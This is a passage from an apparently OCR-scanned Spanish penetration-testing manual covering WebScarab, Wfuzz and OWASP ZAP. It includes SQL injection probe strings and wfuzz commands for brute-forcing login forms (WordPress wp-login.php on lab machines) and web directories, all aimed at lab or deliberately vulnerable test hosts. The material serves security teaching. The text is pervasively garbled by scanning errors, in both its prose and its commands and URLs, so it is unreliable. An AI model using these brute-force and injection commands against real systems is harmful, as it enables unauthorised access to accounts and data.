de permitir que el navegador use una eopia en eaehé loeal. Se reeomienda que esté activa. 

La opción Inject known cookies into requests se puede emplear para inyectar cookies aparte de las 
eonocidas. Las cookies a inyeetar se deben definir en la lista Shared Cookies que está en Pools > 
Shared Cookies. 

La opeión Ge! cookies from responsos forzará al Websearab a extraer los encabezados Set Cookies 
de las respuestas y añadirlas a la lis! Shared Cookies. 

63.1.1. Utilización 

WebSearab mantiene un registro de solieitudes, respuestas y datos asociados desde el inieio hasta 
que finaliza la sesión y en este momento se pierden los datos. Este registro se llama "sesión" y 
no debe confundirse con la gestión de sesión de la aplicaeión. 

Cada vez que ejeeuta WebSearab, lo primero que debe haeer después de verificar la configuración 
es crear una nueva sesión o abrir una sesión existente. Para ello seleceionar una de las opeiones de 
la pestaña File. En el cuadro de diálogo File, navegar hasta el direetorio donde se desean guardar los 
datos de la sesión y proporcionar un nombre para la sesión. WebScarab ereará 2 subdireetorios 
dentro del destino seleeeionado llamado "conversations" para los datos de solieitud y respuesta y 
"fragments" para los seripts y los eomentarios extraídos del contenido HEME. Ambos están 
inieialmente vaeios. 

Para abrir una sesión existente, seleecionar la opeión Open de la pestaña File. 

Periódieamente, seleccionar la opción Save de la pestaña File para forzar la eseritura de todos los 
datos temporales en el directorio de la sesión, principalmente antes de salir de WebScarab. 

Fa pestaña Messages registra las aeciones y muestra los mensajes del sistema. Use Help > Fog level 
para controlar el nivel de detalle. 

En euanto a la proteeeión y la preservación del registro de sesión, tener en euenta que los datos de la 
sesión sean eonfideneiales y también pueden eontener datos confideneiales. Asegúrese de almaeenar 
y proteger los datos de la manera indieada por el eliente, sus propias politieas, la ley de proteeeión 
de datos y otros mandatos. 

Si se desea verificar los datos de solieitud y de respuesta para la página en partieular mencionada en 
la parte inferior de la pestaña Summary, hacer doble elic en él y ver la solicitud analizada en un 
formato tabular y en bruto. Sin embargo la respuesta puede ser vista en formatos HTML, XML, 
texto y hexadeeimal. 

Solicitudes del navegador 

Primero espeeifique donde se almaeenará la sesión. Luego solicitar una página en su navegador. 

La pestaña Summary de esta ventana prineipal se llena con detalles de las solicitudes que se envian 



por el navegador. 


Los ID muestran el orden en que se realiza la solieitud. En este easo, la ID I es la página 
solieitamos, y los siguientes son otros eomponentes de la página (imágenes, JavaSeript, hojas de 
estilo, API, ete.) las refereneias de la página. 

Si se haee eliek en Show eonversation o doble eliek en una entrada, se visualiza el detalle eompleta 
de esta respuesta. 

Solicitudes manuales 

Se puede erear y enviar una solieitud HTTP manualmente en WebSearab. La forma más fáeil 
es usar uno existente y luego editarlo. Se puede eopiar texto de la solieitud sin proeesar. 

Haeer elle y arrastrar para resaltar las 2 primeras líneas y luego Ctrl-C para eopiar al portapapeles. 
Luego ir a la pestaña Manual Request en la ventana prineipal y haeer eliek en la pestaña Raw y 
pegar las 2 líneas seleeeionadas antes. 

Luego haeer elie en el botón "Leteh Responso" y apareeerá la respuesta del servidor en la seeeión 
Responso. 

Interceptando y modificando conversaciones 

En la pestaña Proxy, seleooionar la pestaña Manual Edit. Haeer olio en "Interoept Requests". De 
momento dejar "Interoept Responsos" sin marear. 

Aquí es posible utilizar expresiones regulares para limitar que rutas están inoluidas y exoluidas Por 
lo general, no se querrá interoeptar oada solieitud, ya que oada página puede oontener deoenas de 
soboitudes, la mayoría de las ouales se relaoionan oon oontenido un estátioo, y no desea tener que 
intervenir oon todos. 

Ahora solioitar una URL oon su navegador web. El navegador esperará y WebSearab abrirá una 
ventana Edit Request: 

Aquí se puede editar la solieitud sin proeesar y luego aoeptar / oanoelar los oambios a enviar oomo 
solieitud al servidor web. Abortar la solieitud evitará que se envíe algo al servidor y se mostrará un 
mensaje de error en el navegador. Los enoabezados y / o las oargas útiles se pueden modifioar. 

Del mismo modo, las respuestas se pueden oapturar y modifioar. Esto puede ser útil si el 
oomportamiento de la página web oambia en respuesta a los datos devueltos. 

Comparación de respuestas 

En la pestaña Compare, seleooionar una ID de una oonversaoión de la lista desplegable y luego otra 
de la ouadríoula a oontinuaoión. Las 21as respuestas se muestran una al lado de la otra. 

La oolumna Distanoe en la ouadríoula es una medida de la diferenoia entre las 2 respuestas: en 
realidad, la distanoia de edioión de Levenshtein, que muestra el número de edioiones 
(inseroiones, oambios y eliminaoiones) que se requieren para transformar la respuesta base en 
el objetivo aotual. 

63.1.2. Test 

Durante el período de prueba, se deoide fuzz uno de nuestros enlaoes de apboaoiones de destino que 
tienen los parámetros (por ejemplo, artist =1) oon el método GET. Esto puede revelar oualquier 
vulnerabilidad no identifioada, si existe. Ahora olio dereoho en el enlaoe seleooionado y elegir Use 
oomo plantilla fuzz. Ahora haeer olio en la pestaña Euzzer y aplioar manualmente diferentes valores 
al parámetro haoiendo olio en el botón Add oeroa de la seeeión Parameters. En nuestro oaso, 
esoribimos un pequeño arohivo de texto que enumera los datos de inyeooión SQL oonooidos (por 
ejemplo, 1 AND 1 = 2, 1 AND 1 = 1, oomilla simple (')), y la proporoionó oomo fuente para el valor 
del parámetro fúzzing. Esto se puede lograr usando el botón Souroes debajo de la pestaña Euzzer. 



Una vez que tus datos fuzz estén listos, haeer elle en Start. Después de que todas las pruebas estén 
completas, se puede hacer doble clic en una solicitud individual e inspeccionar su consiguiente 
respuesta. En uno de nuestros casos de prueba, descubrimos una vulnerabilidad de inyección de 
MySQL: °° Error: tiene un error en su sintaxis SQE; revisa el manual que corresponde a la versión 
de su servidor MySQL para que se utilice la sintaxis correcta cerca de '\' 'en la línea 1. 

Advertencia: mysql fetch array (): el argumento proporcionado no es un recurso de resultados 
válido de MySQL en / var / www / vhosts / default / htdocs /listproducts.php en la línea 74 
En nuestro último caso de prueba, se decidió analizar el ID de sesión de la aplicación de destino. 
Para este propósito, ir a la pestaña SessionID Analysis y elegir Previous Requests desde el cuadro 
combinado. Una vez que la solicitud elegida ha sido cargada, ir a la parte inferior, seleccionar 
muestras, por ejemplo, 20 y hacer clic en Eetch para recuperar varias muestras de identificadores de 
sesión Después de esto, hacer clic en el botón Test para comenzar el proceso de análisis. Puede ver 
los resultados en la pestaña Analysis y en la representación gráfica en la pestaña Visualization. Este 
proceso determina la aleatoriedad y la imprevisibilidad de las ID de sesión, lo que podría resultar en 
el secuestro de las sesiones o credenciales de otros usuarios. 



64. Wfuzz 


Wfuzz es una herramienta diseñada para aplieaeiones web de fuerza bruta, que se puede utilizar 
para eneontrar recursos no vinculados (directorios, servlets, Scripts, etc.), parámetros GET y POST 
de bruteforce para verificar diferentes tipos de inyecciones (SQL, XSS, LDAP, etc.), Bruteforce 
Parámetros de formularios (usuario / contraseña), Fuzzing, etc. 

Algunas caracteristicas: 

• Capacidad de múltiples puntos de inyección con múltiples diccionarios. 

• Recursión (Al hacer directorio de fúerza bruta) 

• Forzado bruto de correos, encabezados y datos de autenticación. 

• Salida a HTML 

• Salida de color 

• Ocultar resultados por código de retorno, números de palabra, números de linea, expresiones 
regulares 

• Fuzzing de las cookies 

• Multihilo 

• Soporte proxy 

• Soporte SOCK 

• Retardos entre solicitudes 

• Soporte de autenticación (NTLM, Basic) 

• Todos los parámetros de fuerza bruta (POST y GET) 

• Codificadores múltiples por carga útil 

• Combinaciones de carga útil con iteradores. 

• Solicitud de linea de base (para filtrar resultados) 

• Métodos HTTP de fuerza bruta 

• Soporte múltiple de proxy (cada solicitud a través de un proxy diferente) 

• Escaneo HEAD (más rápido para el descubrimiento de recursos) 

• Diccionarios personalizados para aplicaciones conocidas (Weblogic, Iplanet, Tomcat, 
Domino, Oracle 9i, Vignette, Coldfúsion y muchos más) 

Uso: wfuzz [opciones] <url> 

Opciones: 


-c 

Salida con colores. 

-V 

Información detallada 

-0 printer 

Formato de salida por stderr 

-p addr 

Usar proxy (ip: port o ip: port-ip: port-ip: port) 

-X type 

Usar proxy SOCK (S0CKS4, S0CKS5) 

-tN 

Especificar el número de threads (20 por defecto) 

-sN 

Especificar el tiempo de retardo entre las solicitudes. 
Predeterminado 0 

-e <type> 

Lista de codificaciones/cargas útiles/iteradores/impresoras 
disponibles 

-R depth 

Descubrimiento recursivo de ruta 





-I 

Usar HTTP HEAD en lugar del método GET 

—follow 

Seguir las redirecciones 

-m iterator 

Especificar iterador 

-z payload 

Especificar carga útil (tipo, parámetros, codificación) 

-V alltype 

Todos los parámetros de fuerza bruta (allvars y allpost). No hay 
necesidad de palabras clave FUZZ. 

-X 

Carga útil dentro de los métodos HTTP. No hay necesidad de 
palabras clave FUZZ. 

-b cookie 

Especificar una cookie para las solicitudes. 

-d postdata 

Use datos de publicación. Ej: "id = FUZZ & catalog =1" 

-H headers 

Utilizar encabezados, por ejemplo; "Host: www.mysite.com, 
Cookie; id = 1312321 & user = FUZZ". En formato "usuario: 
pasar" o "FUZZ; FUZZ" o "dominio \ FUZ2Z; FUZZ" 

—basic/ntlm/digest auth 

Utilizar autenticación 

—hc/hl/hw/hh N[,N]+ 

Ocultar respuestas con los códigos/lineas/palabras/caracteres 
especificados 

—hs regex 

Ocultar respuestas con el regex especificado dentro de la 
respuesta 


Fuzzing rutas y ficheros 

Wfuzz se puede usar para busear eontenido oeulto, eomo arehivos y direetorios, dentro de un 
servidor web, lo que permite eneontrar más veetores de ataque. Vale la pena señalar que, el éxito de 
esta tarea depende en gran medida de los diccionarios utilizados. 

Sin embargo, debido al número limitado de plataformas, instalaciones predeterminadas, recursos 
conocidos como archivos de registro, directorios administrativos, un número considerable de 
recursos se encuentran en ubicaciones predecibles. Por lo tanto la fuerza bruta hace que estos 
contenidos se conviertan en una tarea más factible. 

Wfuzz contiene algunos diccionarios, otras listas de palabras de código abierto más grandes y 
actualizadas son; fúzzdb, seclists 

Ejemplo de wfuzz buscando directorios comunes: 

$ wfuzz -w wordlist/general/common. txt http: //testphp. vulnweb. com/FUZZ 
Ejemplo de wfuzz buscando archivos comunes: 

$ wfuzz -w wordlist/general/common. txt http: //testphp. vulnweb. com/EEÍZZ. php 

Fuzzing parámetros en URL 

A menudo se desea incluir algún tipo de datos en la cadena de consulta de la URL, esto se puede 
lograr especificando la palabra clave FUZZ en la URL después de un signo de interrogación: 

$ wfuzz -z range,0-10 —hl 97 http://testphp.vulnweb.com/hstproducts.php?cat=FUZZ 

















Fuzzing POST Requests 

Si se desea fuzz algunos datos eodifieados en un formulario, como lo hará un formulario HTML, 
simplemente pasar un argumento de linea de comando d: 

$ wfuzz -z file, wordlist/others/common_pass. txt -d "uname=FUZZ&pass=FUZZ" 

* Wfuzz 2.2- The Web Fuzzer * 

Target: http: //testphp. vulnweb. com/userinfo. php 
Total requests: 52 


ID Response Lines Word Chars Request 


00044: C=200 114 L 356 W 5111 Ch "test" 

Total time: 2. 140146 
Processed Requests: 52 
Filtered Requests: 51 
Requests/sec. : 24. 29739 

Fuzzing Cookies 

Para enviar sus propias cookies al servidor, por ejemplo, para asociar una solicitud a las sesiones 
HTTP, se puede usar el parámetro -b, que se puede repetir para varias cookies: 

$ wfuzz -z file,wordlist/generaFcommon.txt -b cookie=valuel -b cookie2=value2 
http://testphp.vulnweb.com/FUZZ 

El comando anterior generará las solicitudes HTTP de la forma siguiente: 

GET/attach HTTP/1. 1 
Host: testphp. vulnweb. com 
Accept: */* 

Contení-Type: application/x-www-form-urlencoded 
Cookie: cookie=valuel; cookie2=value2 
User-Agent: Wfuzz/2. 2 
Connection: cióse 

Eas cookies también se pueden fuzz asi: 

$ wfuzz -z file,wordlist/generaFcommon.txt -b cookie=PUZZ http://testphp.vulnweb.com/ 

Fuzzing encabezados a medida 

Si se desea agregar encabezados HTTP a una solicitud, simplemente usar el parámetro -H. Se puede 
repetir para varios encabezados. 

$ wfuzz -z file,wordlist/generaFcommon.txt -H "myheader: headervalue" -H "myheader2: 
headervalue2" http://testphp.vulnweb.com/FUZZ 

El comando anterior generará solicitudes HTTP como el siguiente: 

GET/agent HTTP/1. 1 
Host: testphp. vulnweb. com 







Accept: */* 

Myheader2: headervalue2 
Myheader: headervalue 

Content-Type: application/x-www-form-urlencoded 
User-Agent: Wfuzz/2. 2 
Connection: cióse 

Se pueden modifiear los eneabezados existentes, por ejemplo para especificar un agente de usuario 
personalizado, y ejecutando lo siguiente; 

$ wfuzz -z file,wordlist/general/common.txt -H "myheader: headervalue" -H "User-Agent: 
Googlebot-News" http://testphp.vulnweb.eom/FUZZ 

El comando anterior generará solieitudes HTTP como el siguiente: 

GET/asp HTTP/1. 1 
Host: testphp. vulnweb. eom 
Aecept: */* 

Myheader: headervalue 

Content-Type: applieation/x-www-form-urlencoded 
User-Agent: Googlebot-News 
Conneetion: elose 

Eas cabeceras también se pueden fuzzed así: 

$ wfuzz -z file,wordlist/generaEcommon.txt -H "User-Agent: EUZZ" http://testphp.vulnweb.eom/ 

Fuzzing verbos HTTP 

El fuzzing de los verbos HTTP se puede especifiear utilizando la opeión -X: 

wfuzz -z list, GET-HEAD-POST-TRACE-OPTIONS -X EUZZ http: //testphp.vulnweb.eom 

* Wfuzz 2.2- The Web Euzzer * 

Target: http: //testphp. vulnweb. eom/ 

Total requests: 5 


ID Responso Eines Word Chars Request 


00002: C=200 0 E 0 W 0 Ch "HEAD" 

00004: C=405 7 E 12 W 172 Ch "TRACE" 
00005: C=405 7 E 12 W 172 Ch "OPTIONS" 
00001; C=200 104 E 296 W 4096 Ch "GET" 
00003; C=200 104 E 296 W 4096 Ch "POST" 
Total time; 1. 030354 
Proeessed Requests: 5 
Eiltered Requests; 0 
Requests/sec. ; 4. 852696 


Si se desea realizar las solicitudes eon un verbo espeeífico, también se puede usar "-X HEAD". 


Proxies 

Si se neeesita usar un proxy, simplemente usar el parámetro -p: 







$ wfuzz -z file,wordlist/general/common.txt -p localhost:8080 http://testphp.vulnweb.com/FUZZ 


Además de los servidores proxy HTTP básicos, wfuzz también es compatible con servidores proxy 
que utilizan los protocolos S0CKS4 y S0CKS5: 

$ wfuzz -z file,wordlist/generaFcommon.txt -p localhost:2222:SOCKS5 
http://testphp.vulnweb.com/FUZZ 

Se pueden usar múltiples proxies simultáneamente proporcionando varios parámetros -p: 

$ wfuzz -z file,wordlist/generaFcommon.txt -p localhost:8080 -p localhost:9090 
http://testphp.vulnweb.com/FUZZ 

Cada solicitud se realizará utilizando un proxy diferente cada vez. 

Autenticación 

Wfuzz puede establecer encabezados de autenticación utilizando las opciones de la linea de 
comando —basic/ntlm/digest 

Por ejemplo, un recurso protegido que usa autenticación básica se puede fuzz usando el 
siguiente comando: 

wfuzz -z list, nonvalid-httpwatch —basic FUZZ: FUZZ https: //www. httpwatch.com 
* Wfuzz 2.2- The Web Fuzzer * 

Target: https: //www. httpwatch. com/httpgallery/authentication/authenticatedi 
Total requests: 2 


ID Responso Lines Word Chars Request 


00001: C=401 0 L 11 W 58 Ch "nonvalid" 

00002: C=200 20 L 91 W 5294 Ch "httpwatch" 

Total time: 0. 820029 
Processed Requests: 2 
Filtered Requests: 0 
Requests/sec. : 2. 438938 

Si se desea eliminar un recurso de un sitio web protegido, también se puede usar "—basic user:pass” 

Recursividad 

La opción -R se puede usar para especificar la profundidad de una recursividad de payload. Por 
ejemplo, si se desean buscar directorios existentes y luego fuzz dentro de estos directorios 
nuevamente usando la misma cpayload, se puede usar el siguiente comando: 

wfuzz -z list, "admin-CVS-cgiVbin" -R1 http: //testphp. vulnweb. com/FUZZ 

* Wfuzz 2.2- The Web Fuzzer * 

Target: http: //testphp. vulnweb. com/FUZZ 
Total requests: 3 









ID Response Lines Word Chars Request 


00003: C=403 10 L 29 W 263 Ch "cgi-bin" 

00002: C=301 7 L 12 W 184 Ch "CVS" 

I _ Enqueued response for reeursion (level=l) 

00001: C=301 7 L 12 W 184 Ch "admin" 

I _ Enqueued response for reeursion (level=l) 

00008: C=404 7 E 12 W 168 Ch "admin - CVS" 

00007: C=404 7 E 12 W 168 Ch "admin - admin" 

00005: C=404 7 E 12 W 168 Ch "CVS - CVS" 

00006: C=404 7 E 12 W 168 Ch "CVS - egi-bin" 

00009: C=404 7 E 12 W 168 Ch "admin - egi-bin" 

00004: C=404 7 E 12 W 168 Ch "CVS - admin" 

Escribiendo en un fichero 

Wfuzz soporta escribir los resultados en un archivo en un formato diferente. Esto se realiza 
mediante plugins llamados "printers". Eas impresoras disponibles se pueden enumerar ejecutando: 

$ wfuzz -e printers 

Por ejemplo, para escribir resultados en un archivo de salida en formato JSON, use el siguiente 
comando: 

$ wfuzz -f /tmp/outfde,json -w wordlist/general/common.txt http://testphp.vulnweb.com/EUZZ 

Ejemplo 1. Fuerza bruta con nombres de usuario y contraseñas 

Ejecutar 

wfuzz -c -z file,/root/Documents/MrRobot/fsoc.dic — hs Invalid -d 
“log=EUZZ&pwd=aaaaa” http://l 92.168.240.129/wp-login.php 

Donde 

-c: hace que la salida sea con colores. 

-z: payload/lista de palabras: la lista que se desea que se use. 

— hs: ignora la respuesta que contiene Invalid, h en este caso es hide y s es en realidad la 
opción regex en esta instancia. 

-d: la solicitud de publicación 

EUZZ: la sección de la publicación que quiero fuzz 

Para aclarar lo que está sucediendo aqui, se ha identificado que una respuesta que contiene "Invalid" 
en esta instalación particular de WordPress, se produjo cuando un usuario incorrecto ingresó el 
nombre, por lo que la cadena anterior se usó para pasar el contenido del fsoc.dic en la sección de la 
solicitud "EUZZ". La variable "EUZZ" es la forma de wfuzz de identificar donde debería estar 
insertando la palabra en la lista de palabras. 

Después de que la fuerza bruta devolviera un nombre de usuario que no generó un "Invalid", 
esencialmente invirtió la ubicación de la variable EUZZ e hizo un ajuste a la respuesta para 
ignorarlo. 

wfuzz -c -z file,/root/Documents/MrRobot/fsoc.dic — hs incorrect -d 
“log=eliott&pwd=EUZZ” http://192.168.240.129/wp-login.php 





Como se utilizó la misma lista de palabras en ambas seeeiones, se pude haeer en una eadena eon 
algo similar a lo siguiente 

wfuzz -c -z file,/root/Doeuments/MrRobot/fsoe.die -z 
file,/root/Doeuments/MrRobot/fsoe.die —hs Invalid —hs ineorrect -d 
“log=FUZZ&pwd=FUZ2Z” http://l 92.168.240.129/wp-login.php 

Lo que está sueediendo aqui es que se están definiendo 2 arehivos (-z le,) que en este easo son 
iguales, luego se definen ambas respuestas que no se quieren ver y finalmente se añade FUZZ y 
FUZ2Z a la solieitud de POST. También se puede usar FuZ3Z, FuZ4Z etc si se desean múltiples 
valores de fuerza bruta. El orden de los archivos especificados es importante en esta etapa. Si se 
estaba usando un archivo para nombres de usuario (FUZZ) y otro para las contraseñas (FUZ2Z), 
deberá asegurarse de que fueron presentados en este orden. Un ejemplo de esto es: 

wfuzz.py -c -z file,users.txt -z file,pass.txt — se 200 
http://www.site. com/log.asp?user=FUZZ&pass=FUZ2Z 

Users.txt se especifica primero, luego pass.txt y mirando la solicitud de post se puede ver cual es el 
orden de presentación. 

Ejemplo 2. Fuerza bruta de directorio 

Ejecutar lo siguiente: 

root@kali:-'/necromancer# wfuzz -c -z file,/root/necromancer/thing.txt — he 404 
http://192.168.56.102/amagicbridgeappearsatthechasm/EUZZ 

En este ejemplo no se está pasando una solicitud POST, sino que es literalmente fuerza bruta 
obligando a la dirección a la que se va e ignorando cualquier cosa que regrese como una respuesta 
404. (he = ocultar código) 

Nuevamente si quisiéramos agregar múltiples variables en el proceso, seria exactamente lo mismo 
que con los nombres de usuario y se veria asi: 

root@kali:'-'/necromancer# wfuzz -c -z 
file,/root/necromancer/thing.txt -z 
file,/usr/share/wordlists/rockyou.txt — he 404 
http ://l 92.168.56.102/amagicbridgeappearsatthechasm/PUZZ/PUZ2Z 


En el siguiente ejemplo, se está haciendo algo muy similar, pero pasando el parámetro -H que es 
-H headers : Use headers, por ejemplo, Host:www. mysite. com, Cookie:id= 1 31 2321 &user= 
EUZZ" 



65. ZAP 


El Proxy Zed Attack (ZAP) de OWASP es una herramienta de prueba de penetraeión integrada fácil 
de usar para encontrar vulnerabilidades en aplicaciones web. Está diseñado para ser utilizado por 
personas con una amplia gama de experiencia en seguridad y por lo tanto es ideal para 
desarrolladores y evaluadores funcionales que son nuevos en las pruebas de penetración, además de 
ser una adición útil a una caja de herramientas experimentada de probadores de lápiz. 

Eas principales características son 

• Proxy interceptor 

• Escáneres activos y pasivos. 

• Arañas tradicionales y de Ajax 

• Soporte de WebSockets 

• Navegación forzada usando el código OWASP DirBuster 

• Euzzing usando fuzzdb y OWASP JBroEuzz 

• Mercado de complementos en linea 

65.1. Pruebas de seguridad 

Ea prueba de seguridad de software es el proceso de evaluar y probar un sistema para descubrir sus 
riesgos de seguridad y las vulnerabilidades del sistema y sus datos. No existe una terminologia 
universal pero se trata de realizar las evaluaciones necesarias tales como el análisis y el 
descubrimiento de vulnerabilidades sin intentar realmente explotar estas vulnerabilidades. 

Eas pruebas de seguridad se desglosan según el tipo de vulnerabilidad que se prueba o el tipo de 
prueba que se realiza, asi se puede hablar de: 

• Evaluación de vulnerabilidad: el sistema es escaneado y se analiza en busca de cuestiones 
de seguridad. 

• Pruebas de penetración: el sistema se somete a un análisis y a los ataques simulados de 
atacantes maliciosos 

• Pruebas de tiempo de ejecución: el sistema se somete a análisis y pruebas de seguridad de 
un usuario final. 

• Revisión del código: el código del sistema se somete a una revisión y análisis detallados, 
especificamente en cuanto a las vulnerabilidades de seguridad. 

Tener en cuenta que la evaluación de riesgos que comúnmente se incluye como parte de las pruebas 
de seguridad, no es está incluido en esta lista. Esto se debe a que una evaluación de riesgos no es 
realmente una prueba, sino más bien un análisis de la gravedad percibida de los diferentes riesgos 
(seguridad del software, seguridad del personal, seguridad de hardware, etc.) y cualquier paso de 
mitigación para esos riesgos. 

Ea prueba de penetración se lleva a cabo como si el probador fúera un atacante malicioso externo 
con el objetivo de entrar en el sistema y robar datos o llevar a cabo 
algún tipo de ataque de denegación de servicio. 

Ea prueba de penetración tiene la ventaja de ser más preciso porque tiene menos falsos positivos, es 
decir, resultados que informan una vulnerabilidad que en realidad no está presente, pero que puede 
consumir mucho tiempo de ejecución. 

Ea prueba de penetración también se usa para probar los mecanismos de defensa, verificar los 
planes de respuesta y confirmar la efectividad de las politicas de seguridad. 



La prueba de penetraeión automatizada es una parte importante de la eontinua validaeión de 
integraeión. Ayuda a deseubrir nuevas vulnerabilidades, asi eomo regresiones para vulnerabilidades 
anteriores en un entorno que eambia rápidamente y para el eual el desarrollo puede ser altamente 
eolaborativo y distribuido. 

El proceso de la prueba de penetración 

Se usan tanto el proeeso manual eomo el automatizado y a menudo en eonjunto, para probarlo todo 
desde servidores, redes, dispositivos y puntos finales. Generalmente sigue estas etapas: 

• Explorar: el probador intenta aprender sobre el sistema que se está probando. Esto ineluye 
tratar de determinar que software se está usando, que puntos finales existen, que parehes hay 
instalados, ete. También ineluye la búsqueda de eontenido oeulto, de vulnerabilidades 
eonoeidas y otras indieaeiones de debilidad. 

• Ataear: el probador intenta explotar las vulnerabilidades eonoeidas o sospeehosas para 
probar que existen 

• Informar: el probador informa de los resultados de sus pruebas, ineluido el vulnerabilidades, 
eomo los explotaron y lo difieiles que fueron los exploits y la severidad de la explotaeión. 

El objetivo final de la prueba de penetraeión es busear vulnerabilidades para que estas 
vulnerabilidades se puedan arreglar. También puede verifiear que un sistema no sea vulnerable a 
una elase eonoeida o a un defeeto espeeifieado o en el easo de vulnerabilidades, que se hayan 
reportado eomo solueionable y verifique que el sistema ya no es vulnerable a ese defeeto. 

65.2. Descripción 

Zed Attaek Proxy (ZAP) es una herramienta gratuita de prueba de penetraeión de eódigo abierto que 
se mantiene bajo el paraguas del Open Web Applieation Seeurity Projeet (OWASP). ZAP está 
diseñado espeeifieamente para probar aplieaeiones web y es a la vez flexible y extensible. En 
eseneia, ZAP es lo que se eonoee eomo un proxy “man-in-the-middle". Se interpone entre el 
navegador del probador y la aplieaeión web para que pueda intereeptar e inspeeeionar los mensajes 
enviados entre el navegador y la aplieaeión web, modifiear los eontenidos si es neeesario y luego 
reenviar esos paquetes al destino. Se puede usar eomo una aplieaeión independiente y eomo proeeso 
deamon. 

Si ya hay otro proxy de red en uso, eomo en muehos entornos eorporativos, ZAP puede ser eonfiado 
para eoneetarse a este proxy 

ZAP proporeiona funeionalidad para una variedad de niveles de habilidad, desde desarrolladores 
hasta nuevos probadores en pruebas de seguridad, a espeeialistas en pruebas de seguridad. ZAP 
tiene versiones para eada sistema operativo y Doeker, por lo que no está vineulado a un solo sistema 
operativo. Ea funeionalidad adieional está disponible gratuitamente eon muehos add-ons en ZAP 
Marketplaee, aeeesibles desde el eliente ZAP. 

Debido a que ZAP es de eódigo abierto, se puede examinar el eódigo fuente para ver exaetamente 
eomo se implementa su funeionalidad. Cualquiera puede ofreeerse eomo voluntario para trabajar en 
ZAP, solueionar errores, agregar funeiones, erear solieitudes de extraeeión para atraer a los 
eandidatos al proyeeto y orear oomplementos para soportar situaoiones espeoializadas. 
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Cuando se inicia ZAP por primera vez, se le preguntará si desea mantener la sesión anterior. Por 
defecto, las sesiones ZAP siempre se graban en el disco en una base de datos HSQLDB con un 
nombre predeterminado y una ubicación. Si no persiste la sesión, esas acciones se eliminarán 
cuando salga de ZAP. Si se elige mantener una sesión, la información de la sesión se guardará en la 
base de datos local, para que pueda acceder más tarde, y podrá proporcionar nombres y ubicaciones 
personalizados para salvar los datos de las sesiones. 

Escritorio de ZAP 

La interfaz de usuario del escritorio de ZAP se compone de los siguientes elementos; 

1. Barra de menú; proporciona acceso a muchas de las herramientas automáticas y manuales. 

2. Barra de herramientas; incluye botones que proporcionan un fácil acceso a las caracteristicas más 
utilizadas 

3. Ventana Tree; muestra el árbol Sites y el árbol Scripts. 

4. Ventana Workspace; muestra las solicitudes, las respuestas y los Scripts y permite editarlos 

5. Ventana de información; muestra detalles de las herramientas automáticas y manuales. 

6. Footer; muestra un resumen de las alertas encontradas y el estado de las principales 
herramientas automatizadas 

Mientras se usa ZAP, puede hacer clic en Help en la barra de menú o presionar F1 para acceder a la 
ayuda de la ZAP Desktop User Guide. También está disponible en linea. ZAP también admite una 
potente fúncionalidad de API y linea de comandos. 

Para cambiar ZAP al modo seguro, hacer clic en la flecha en el menú desplegable de modo en la 
barra de herramientas principal para expanda la lista desplegable y seleccione Safe Mode. 

Ejecutar un escaneo automatizado 

La forma más fácil de comenzar a usar ZAP es a través de la pestaña Quick Start, que es un add-on 
de ZAP y se incluyó automáticamente cuando se instala ZAP. 




















Para ejecutar un análisis automático de inicio rápido: 

1. Iniciar ZAP y haga clic en la pestaña Quick Start de la Ventana Workspace. 

2. Haga clic en el botón grande Automated Sean. 

3. En el cuadro de texto de URL, escribir el nombre completo de la URL a atacar. 

4. Haga clic en el botón Attack. 

ZAP procederá a rastrear la aplicación web con su araña y escaneará pasivamente cada página que 
encuentre. Luego ZAP usará el escáner activo para atacar todas las páginas descubiertas, su 
funcionalidad y sus parámetros. 

ZAP proporciona 2 arañas para rastrear aplicaciones web y se puede usar una o ambas desde esta 
pantalla. La araña ZAP tradicional que descubre los enlaces examinando las páginas HTML en las 
respuestas de la aplicación web. Esta araña es rápida, pero no siempre es efectiva al explorar una 
aplicación web hecha con AJAX, que genera enlaces usando JavaScript. 

Para las aplicaciones AJAX, es probable que la araña AJAX de ZAP sea más efectiva. Esta araña 
explora la aplicación web invocando a los navegadores que luego siguen los enlaces que han sido 
generados. La araña AJAX es más lenta que la araña tradicional y requiere una configuración 
adicional para usarla en un entorno sin cabeceras. 

ZAP escaneará pasivamente todas las solicitudes y las respuestas enviadas a través de él. Hasta 
ahora ZAP solo realizó escaneos pasivos de su aplicación web. El escaneo pasivo no cambia 
las respuestas de cualquier manera y se considera seguro. El escaneo también se realiza en segundo 
plano. El escaneo pasivo es bueno para tratar algunas vulnerabilidades y como una forma de tener 
una idea del estado básico de seguridad de una aplicación web y localizar donde más investigación 
puede estar justificada. 

Sin embargo el escaneo activo intenta encontrar otras vulnerabilidades mediante el uso de ataques 
conocidos contra los objetivos seleccionados. El escaneo activo es un verdadero ataque a estos 
objetivos y puede poner los objetivos en riesgo, asi que no usar el escaneo activo contra objetivos 
de los que no se tiene permiso. 

Interpretación de los resultados de la prueba 

A medida que ZAP analiza la aplicación web, construye un mapa de las páginas de sus aplicaciones 
web y los recursos utilizados para representar estas páginas. Luego registra las solicitudes y las 
respuestas enviadas y recibidas de cada página y crea alertas si hay algo potencialmente mal con 
una solicitud una o respuesta. 

Para examinar una vista en árbol de las páginas exploradas, hacer clic en la pestaña Sites en la 
Ventana Tree. Se pueden expandir los nodos para ver las URL individuales a las que se accede. 

El lado izquierdo de Looter contiene un recuento de las alertas encontradas durante la prueba, 
ordenado en categorías de riesgo. Estas categorías de riesgo son: High, Médium, Low, International, 
Ealse Positive 

Para ver las alertas creadas durante la prueba: 

1. Hacer clic en la pestaña Alerts en la Ventana Information 

2. Hacer clic en cada alerta que se muestra en esta ventana para mostrar la URL y la vulnerabilidad 
detectado en el lado derecho de la ventana Information. 

3. En la venta Workspace, hacer clic en la pestaña Response para ver el contenido del encabezado 
y el cuerpo de la respuesta. La parte de la respuesta que generó la alerta será resaltado 



Explorando una aplicación manualmente 

El escaneo pasivo y la funcionalidad de ataque automatizado es una exeelente manera de eomenzar 
una evaluación de vulnerabilidad de una aplieaeión web pero tiene algunas limitaeiones. Entre estas 
están: 

• Eas páginas protegidas por una página de inieio de sesión no se pueden descubrir durante un 
escaneo pasivo porque, a menos que haya eonfiado la funeionalidad de autenticación de 
ZAP, ZAP no maneja la autentieaeión requerida 

• No tiene mueho eontrol sobre la seeueneia de exploraeión en una exploraeión pasiva o los 
tipos de ataque llevados a cabo en un ataque automatizado. ZAP proporeiona muchas 
opciones adieionales para la exploraeión y los ataques fuera del eseaneo pasivo. 

Eas arañas son una exeelente manera de explorar un sitio básieo, pero deben combinarse eon una 
exploración manual para ser más efieaz. Eas arañas, por ejemplo, solo ingresarán los datos básieos 
predeterminados en los formularios de la aplieaeión web pero un usuario puede ingresar 
